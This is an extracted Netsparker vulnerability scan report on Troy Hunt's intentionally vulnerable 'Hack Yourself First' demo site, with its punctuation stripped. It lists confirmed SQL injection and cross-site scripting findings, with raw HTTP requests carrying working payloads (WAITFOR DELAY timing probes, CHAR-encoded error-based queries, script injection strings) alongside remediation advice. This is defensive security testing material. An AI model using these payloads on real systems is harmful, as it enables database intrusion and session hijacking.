RequestGET Make2orderby=1+WAITFOR+DELAY+2703a03a2527-- HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
8 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230334 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtMcLarens - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
15 apivote CONFIRMEDhttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST ) WAITFOR DELAY 0025--
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 68Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=27)+WAITFOR+DELAY+2703a03a2527--
ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232122 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
9 57
5 TOTALCRITICAL
CONFIRMED
5
2 SQL InjectionNetsparkeridentifiedanSQLinjectionwhichoccurswhendatainputbyauserisinterpretedasanSQLcommandratherthanasnormaldatabythebackenddatabase
Thisisanextremelycommonvulnerabilityanditssuccessfulexploitationcanhavecriticalimplications
NetsparkerconfirmedthevulnerabilitybyexecutingatestSQLqueryonthebackenddatabase
ImpactDependingonthebackenddatabasethedatabaseconnectionsettingsandtheoperatingsystemanattackercanmountoneormoreofthefollowingtypeofattackssuccessfully
ReadingupdatinganddeletingarbitrarydataortablesfromthedatabaseExecutingcommandsontheunderlyingoperatingsystem
Actions to Take1 Seetheremedyforsolution2 Ifyouarenotusingadatabaseaccesslayer(DAL)considerusingoneThiswillhelpyoucentralizetheissueYoucanalsouseORM(object relational mapping)MostoftheORMsystemsuseonlyparameterizedqueriesandthiscansolvethewholeSQLinjectionproblem
3 LocateallofthedynamicallygeneratedSQLqueriesandconvertthemtoparameterizedqueries(If you decide to use a DALORM changeall legacy code to use these new libraries)
4 Useyourweblogsandapplicationlogstoseeiftherewereanypreviousbutundetectedattackstothisresource
RemedyArobustmethodformitigatingthethreatofSQLinjection-basedvulnerabilitiesistouseparameterizedqueries(prepared statements)Almostallmodernlanguagesprovidebuilt-inlibrariesforthisWhereverpossibledonotcreatedynamicSQLqueriesorSQLquerieswithstringconcatenation
Required Skills for Successful ExploitationTherearenumerousfreelyavailabletoolstoexploitSQLinjectionvulnerabilitiesThisisacomplexareawithmanydependencieshoweveritshouldbenotedthatthenumerousresourcesavailableinthisareahaveraisedbothattackerawarenessoftheissuesandtheirabilitytodiscoverandleveragethemSQLinjectionisoneofthemostcommonwebapplicationvulnerabilities
External ReferencesOWASPSQLinjectionSQLinjectionCheatsheet
Remedy ReferencesMSDN-ProtectFromSQLinjectioninASPNET
ClassificationOWASP2010-A1OWASP2013-A1PCIV20-651PCIV30-651CWE-89CAPEC-66WASC-19
21 apivote CONFIRMEDhttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101) C
Extracted Datamicrosoft sql azure (rtm) - 110922217 ntaug 20 2014 223756 ntcopyright (c) microsoft corporationn
10 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 209Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=272b+(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)+2b27
ResponsehellipPNETContent-Length 2867Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageConversion failed when converting the varchar value _2dilemma to data typeintExceptionTypeSystemDataSqlClientSqlExceptionStackTrace at SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnectionAction`1 wraphellip
22 SupercarLeaderboard CONFIRMEDhttphackyourselffirsttroyhuntcomSupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2b
ParametersParameter Type Value
orderBy GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
asc GET false
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET SupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)ampasc=false HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept texthtmlapplicationxhtml+xmlapplicationxmlq=09imagewebpq=08Referer httphackyourselffirsttroyhuntcomSupercarLeaderboardAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
11 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14292Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
23 Make2 CONFIRMEDhttphackyourselffirsttroyhuntcomMake2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
12 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
24 Make3 CONFIRMEDhttphackyourselffirsttroyhuntcomMake3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
13 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
25 Make1 CONFIRMEDhttphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
14 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
15 57
1 TOTALIMPORTANT
CONFIRMED
1
3 Cross-site ScriptingNetsparkerdetectedcross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScript VBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofcross-sitescriptingincluding
HijackingusersactivesessionMountingphishingattacksInterceptingdataandperformingman-in-the-middleattacks
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisoutputshouldbeencodedaccordingtotheoutputlocationandcontextForexampleiftheoutputgoesintoaJavaScriptblockwithintheHTMLdocumentthenoutputneedstobeencodedaccordinglyEncodingcangetverycomplexthereforeitsstronglyrecommendedtouseanencodinglibrarysuchasOWASPESAPIandMicrosoftAnti-cross-sitescripting
Remedy ReferencesMicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
Proof of Concept NotesGeneratedXSSexploitmightnotworkduetobrowserXSSfilteringPleasefollowtheguidelinesbelowinordertodisableXSSfilteringfordifferentbrowsersAlsonotethat
XSSfilteringisafeaturethatsenabledbydefaultinsomeofthemodernbrowsersItshouldonlybedisabledtemporarilytotestexploitsandshouldberevertedbackifthebrowserisactivelyusedotherthantestingpurposesEventhoughbrowsershavecertaincheckstopreventCross-sitescriptingattacksinpracticethereareavarietyofwaystobypassthismechanismthereforeawebapplicationshouldnotrelyonthiskindofclient-sidebrowserchecks
Chrome
OpencommandpromptGotofolderwherechromeexeislocatedRunthecommandchromeexe --args --disable-xss-auditor
InternetExplorer
ClickTools-gtInternetOptionsandthennavigatetotheSecurityTabClickCustomlevelandscrolltowardsthebottomwhereyouwillfindthatEnableXSSfilteriscurrentlyEnabledSetittodisabledClickOKClickYestoacceptthewarningfollowedbyApply
Firefox
GotoaboutconfigintheURLaddressbarInthesearchfieldtypeurlbarfilterandfindbrowserurlbarfilterjavascriptSetitsvaluetofalsebydoubleclickingtherow
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
16 57
31 Search CONFIRMEDhttphackyourselffirsttroyhuntcomSearchsearchTerm=2Bnetsparker(9)2B
ParametersParameter Type Value
searchTerm GET +netsparker(9)+
RequestGET SearchsearchTerm=2Bnetsparker(9)2B HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Responsehellipltsectiongtltdivgtltdivgtltdivgtltdivgtltheadergt
ltdiv class=containergtltsectiongt
lth2gtYou searched for ampquotltspan id=searchTermgt+netsparker(9)+ltspangtampquotlth2gt
ltp class=alert alert-errorgtNo results found for your searchltpgt
ltsectiongtlthrgtltfootergtltpgtampcopy 2014 - Hack Yourself Firstltpgtltfootergt
hellipgtltscriptgt
ltscriptgt$(results tr)click(function () var url = Supercar + $(this)attr(id)windowlocationhref = url)
$(searchTerm)val(+netsparker(9)+)ltscriptgt
ltscriptgt(function (i s o g r a m) i[GoogleAnalyticsObject] = r i[r] = i[r] || function () (i[r]q = i[r]q || [])push(arguments) i[rhellip
17 57
1 TOTALIMPORTANT
CONFIRMED
1
4 Permanent Cross-site ScriptingNetsparkeridentifiedpermanentcross-sitescriptingandconfirmedthisvulnerabilitybyanalyzingtheexecutionofinjectedJavaScript
PermanentXSSallowsanattackertoexecutedynamicscripts(JavaScript VBScript)inthecontextoftheapplicationThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbytheuserhasbeeninterpretedbyHTMLJavaScriptVBScriptwithinthebrowser
PermanentmeansthattheattackwillbestoredinthebackendsystemInnormalXSSattacksanattackerneedstoe-mailthevictimbutinapermanentXSSanattackercanjustexecutetheattackandwaitforuserstoseetheaffectedpageAssoonassomeonevisitsthepagetheattackersstoredpayloadwillgetexecuted
XSStargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitonlyallowsattackerstohijackotheruserssessionstheattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactPermanentXSSisadangerousissuethathasmanyexploitationvectorssomeofwhichinclude
Userssession-sensitiveinformationsuchascookiescanbestolenXSScanenableclient-sidewormswhichcouldmodifydeleteorstealotherusersdatawithintheapplicationThewebsitecanberedirectedtoanewlocationdefacedorusedasaphishingsite
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredOutputshouldbefilteredaccordingtotheoutputformatandlocationTypicallytheoutputlocationisHTMLWheretheoutputisHTMLensureallactivecontentisremovedpriortoitspresentationtotheserver
Priortosanitizinguserinputensureyouhaveapre-definedlistofbothexpectedandacceptablecharacterswithwhichyoupopulateawhitelistThislistneedsonlybedefinedonceandshouldbeusedtosanitizeandvalidateallsubsequentinput
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsgoodexamplesoftheseincludetheOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-Cross-siteScriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
41 Supercar3 CONFIRMEDhttphackyourselffirsttroyhuntcomSupercar3
Injection URLhttphackyourselffirsttroyhuntcomapivote
18 57
Injection RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 77Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=223e3cnet+sparker3dnetsparker(0x00043F)3e
